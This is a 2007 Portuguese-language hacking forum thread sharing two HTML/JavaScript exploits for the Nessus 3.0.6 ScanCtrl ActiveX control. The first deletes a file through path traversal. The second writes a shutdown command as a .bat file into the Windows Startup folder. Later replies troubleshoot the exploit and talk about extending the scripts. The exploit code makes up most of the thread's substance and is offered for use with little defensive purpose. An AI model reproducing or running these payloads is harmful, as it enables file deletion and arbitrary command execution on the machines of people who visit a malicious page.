[Vulnerabilidade] Nessus 3.0.6

Started by HadeS, 06 de August , 2007, 11:30:57 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

HadeS

Uma falha no Nessus permite que usuários mal intencionados rodem comandos por controles ActiveX no computador da vítima.

A falha está em: Nessus SCANCTRL.ScanCtrlCtrl.1 ActiveX Control

Veja um exemplo de código para exploração:

<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>

Um outro exemplo:

<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.

HadeS

Be.Cool

Orra muito loko!
da pra dar uma implementada legal nesses script!
vlw


fui.

A sabedoria está em suas mãos

Anonymous

[O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.]

HadeS,

Neste trecho do primeiro código, vc substituiu as barras por diretórios ou deixou assim, porque comigo não aconteceu nada.

            obj.deleteReport("../../../../../../../test.txt");

Be.Cool

@DARK BOMBER
Não precisa colocar os diretorios porque o ../ significa que vc vai descer um diretorio
ou seja se vc colocar varios ../ vc vai chegar na raiz do sistema onde vc devia ter colocado o test.txt



fui.

A sabedoria está em suas mãos

Anonymous

Pois é, foi assim que eu testei e não deu certo, por isso que eu tava achando
 que  tinha que mudar os diretórios.

Criei um arquivo qualquer no disco C:  com o nome test.txt , em seguida abri o primeiro código no browser e não aconteceu nada com o arquivo no disco c:.

Be.Cool

vc tem o nessus?
vc deixou ele executando?



fui.

A sabedoria está em suas mãos

Anonymous


HadeS

Huahauhauauahuahau...

A falha está no Nessus cara, como quer ser explorado sem ter ele instalado?

lol

HadeS

Anonymous


Dri.vicaria

Êta preguiça.........http://www.nessus.org/

 Pô, rapaz,  é o mais famoso scanner de vulnerabilidade...com Linux, of corse !!!!  ;)
Bjs,

Dri

Anonymous

É que o nessus eu não conhecia.

tô baixando!
brigado.  ::)

Anonymous

Desculpa pelo duplo post, é que usei o nessus e acho que ele abriu 4 portas aki, tem como fechar?


Ele é poderoso!

Be.Cool

@dark bomber
vc pode bloquea-lo pelo firewall ou baixa o porgrama tcp list do Dark_Side que fecha a porta que vc quiser =)
vlw



fui.

A sabedoria está em suas mãos